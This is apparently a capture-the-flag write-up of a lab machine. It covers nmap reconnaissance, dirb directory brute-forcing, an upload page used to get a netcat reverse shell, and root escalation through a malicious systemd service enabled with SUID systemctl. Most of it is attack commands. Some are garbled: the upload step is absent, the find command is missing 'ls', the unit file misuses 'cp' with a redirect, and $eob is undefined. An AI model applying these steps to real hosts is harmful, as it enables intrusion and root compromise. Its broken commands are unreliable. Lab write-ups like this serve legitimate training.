Technology with Security
24 June 2020
Focuses on active recon, Web app attacks and privilege escalation
Gathering information about the machine using tools such as nmap. Always perform reconnaissance thoroughly before progressing.
nmap -v -A -sV -sC -A -p- -Pn -oN nmap.out 10.10.228.44
-A : Aggressive Scan and provides OS and Version Detection
-sV : Discovers the Services with their versions
-sC: Scan with default nmap scripts
-p-: Scan all 65535 ports
-Pn: Disable the host discovery and perform only scan on open ports
-oN: Save the output in a file
Result:
Using dirb scan the HTTP service to find the directories.
dirb http://10.10.228.44:3333/ /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Result
GENERATED WORDS: 87568
---- Scanning URL: http://10.10.228.44:3333/ ----
==> DIRECTORY: http://10.10.228.44:3333/images/
==> DIRECTORY: http://10.10.228.44:3333/css/
==> DIRECTORY: http://10.10.228.44:3333/js/
==> DIRECTORY: http://10.10.228.44:3333/fonts/
==> DIRECTORY: http://10.10.228.44:3333/internal/
Navigated to these directories and found /internal/
is hosting a upload page.
nc -nlvp 4444
/internal/uploads/
and the reverse shell connection is established.find / -perm /4000 -type f -exec -ld {} \; 2>/dev/null
$ echo '[Service]
ExecStart=/bin/sh -c "cp /root/root.txt > /tmp/flag.txt"
[Install]
WantedBy=multi-user.target' > $eob
$ /bin/systemctl link $eob
$ /bin/systemctl enable --now $eob